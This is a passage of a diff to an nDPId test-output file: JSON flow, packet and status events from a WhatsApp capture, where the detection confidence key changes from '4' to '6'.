{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655061873005,"flow_last_seen":1655061873005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655061873005,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.93.54","src_port":49096,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1655061873005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655061873005,"pkt":"eJS0JASgYDjgxTWgCABFAAA8rKJAAD8GT8rAqAJkHw1dNr\/IFGZDXSW2AAAAAKAC\/\/\/P8AAAAgQFtAQCCAokHtddAAAAAAEDAwk="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1655061873153,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655061873153,"pkt":"eJS0JASgYDjgxTWgCABFAAA0rKNAAD8GT9HAqAJkHw1dNr\/IFGZDXSW3fPQug4AQAID6IQAAAQEICiQe1\/I8Thuy"} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1655061873186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655061873186,"pkt":"eJS0JASgYDjgxTWgCABFAAA4rKRAAD8GT8zAqAJkHw1dNr\/IFGZDXSW3fPQug4AYAIC0sAAAAQEICiQe2BI8ThuyRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655061873005,"flow_last_seen":1655061873368,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655061873368,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.93.54","src_port":49096,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655061873005,"flow_last_seen":1655061873368,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655061873368,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.93.54","src_port":49096,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":266,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":266,"packets-processed":265,"total-skipped-flows":0,"total-l4-payload-len":23230,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":33,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":33,"total-idle-flows":27,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":219,"global_ts_msec":1655062569330} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655062569330,"flow_last_seen":1655062569330,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655062569330,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43978,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1655062569330,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655062569330,"pkt":"eJS0JASgYDjgxTWgCABFAAA8MZZAAD8G0KvAqAJkszzDMavKFGbYH58HAAAAAKAC\/\/9yPQAAAgQFtAQCCAo4IyzLAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1655062569374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655062569374,"pkt":"eJS0JASgYDjgxTWgCABFAAA0MZdAAD8G0LLAqAJkszzDMavKFGbYH58IMQLbuIAQAIC6CgAAAQEICjgjLRYTN8Yz"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1655062569381,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655062569381,"pkt":"eJS0JASgYDjgxTWgCABFAAA4MZhAAD8G0K3AqAJkszzDMavKFGbYH58IMQLbuIAYAIB0sgAAAQEICjgjLR0TN8YzRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655062569330,"flow_last_seen":1655062569427,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655062569427,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43978,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":274,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655054457330,"flow_last_seen":1655054457533,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655062569674,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46468,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655062569330,"flow_last_seen":1655062569427,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655062569427,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43978,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":274,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655054457330,"flow_last_seen":1655054457533,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655062569674,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46468,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":274,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":274,"packets-processed":273,"total-skipped-flows":0,"total-l4-payload-len":23564,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":34,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":34,"total-idle-flows":28,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":226,"global_ts_msec":1655063661893} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655063661893,"flow_last_seen":1655063661893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655063661893,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40990,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1655063661893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655063661893,"pkt":"eJS0JASgYDjgxTWgCABFAAA86plAAD8GF7jAqAJkszzDIaAeFGY4VRBmAAAAAKAC\/\/\/+RwAAAgQFtAQCCAoF0w05AAAAAAEDAwk="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1655063661925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655063661925,"pkt":"eJS0JASgYDjgxTWgCABFAAA06ppAAD8GF7\/AqAJkszzDIaAeFGY4VRBnHmH5pIAQAKyJNgAAAQEICgXTDVr1t5VE"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1655063661926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655063661926,"pkt":"eJS0JASgYDjgxTWgCABFAAA46ptAAD8GF7rAqAJkszzDIaAeFGY4VRBnHmH5pIAYAKxD5AAAAQEICgXTDVv1t5VERUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655063661893,"flow_last_seen":1655063661927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655063661927,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40990,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655063661893,"flow_last_seen":1655063661927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655063661927,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40990,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":282,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":282,"packets-processed":281,"total-skipped-flows":0,"total-l4-payload-len":24837,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":35,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":35,"total-idle-flows":28,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":232,"global_ts_msec":1655064434682} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655064434682,"flow_last_seen":1655064434682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655064434682,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45290,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1655064434682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655064434682,"pkt":"eJS0JASgYDjgxTWgCABFAAA8Z49AAD8GmrLAqAJkszzDMbDqFGZ3oUxiAAAAAKAC\/\/\/KHwAAAgQFtAQCCArGt\/RXAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1655064434714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655064434714,"pkt":"eJS0JASgYDjgxTWgCABFAAA0Z5BAAD8GmrnAqAJkszzDMbDqFGZ3oUxjZjrG2IAQAKzrtwAAAQEICsa39HeqpjSg"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1655064434759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655064434759,"pkt":"eJS0JASgYDjgxTWgCABFAAA4Z5FAAD8GmrTAqAJkszzDMbDqFGZ3oUxjZjrG2IAYAKymOQAAAQEICsa39KSqpjSgRUQAAQ=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655064434682,"flow_last_seen":1655064434792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655064434792,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45290,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":290,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655056441533,"flow_last_seen":1655056441715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655064435041,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47360,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655064434682,"flow_last_seen":1655064434792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655064434792,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45290,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":290,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655056441533,"flow_last_seen":1655056441715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655064435041,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47360,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":290,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":290,"packets-processed":289,"total-skipped-flows":0,"total-l4-payload-len":25160,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":36,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":36,"total-idle-flows":29,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":239,"global_ts_msec":1655065264797} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655065264797,"flow_last_seen":1655065264797,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655065264797,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51544,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1655065264797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655065264797,"pkt":"eJS0JASgYDjgxTWgCABFAAA8ttVAAD8GS2zAqAJkszzDMclYFGbchY4CAAAAAKAC\/\/8wGwAAAgQFtAQCCApH\/04jAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1655065264828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655065264828,"pkt":"eJS0JASgYDjgxTWgCABFAAA0ttZAAD8GS3PAqAJkszzDMclYFGbchY4DukzwuYAQAVeNLQAAAQEICkf\/TkbK+lov"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1655065265098,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655065265098,"pkt":"eJS0JASgYDjgxTWgCABFAAA4ttdAAD8GS27AqAJkszzDMclYFGbchY4DukzwuYAYAVdG0gAAAQEICkf\/T1DK+lovRUQAAQ=="} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655065264797,"flow_last_seen":1655065265128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655065265128,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51544,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655065264797,"flow_last_seen":1655065265128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655065265128,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51544,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":298,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":298,"packets-processed":297,"total-skipped-flows":0,"total-l4-payload-len":25440,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":37,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":37,"total-idle-flows":29,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":245,"global_ts_msec":1655065885451} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655065885451,"flow_last_seen":1655065885451,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655065885451,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47948,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1655065885451,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655065885451,"pkt":"eJS0JASgYDjgxTWgCABFAAA8arBAAD8Gl5HAqAJkszzDMbtMFGZqrJ7gAAAAAKAC\/\/9fsQAAAgQFtAQCCApxKmRoAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1655065885484,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655065885484,"pkt":"eJS0JASgYDjgxTWgCABFAAA0arFAAD8Gl5jAqAJkszzDMbtMFGZqrJ7h+p4p8oAQAIDu2wAAAQEICnEqZIk6KEA5"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1655065885533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655065885533,"pkt":"eJS0JASgYDjgxTWgCABFAAA4arJAAD8Gl5PAqAJkszzDMbtMFGZqrJ7h+p4p8oAYAICpZQAAAQEICnEqZK46KEA5RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655065885451,"flow_last_seen":1655065885566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655065885566,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47948,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655065885451,"flow_last_seen":1655065885566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655065885566,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47948,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655065885823,"flow_last_seen":1655065885823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655065885823,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":51724,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 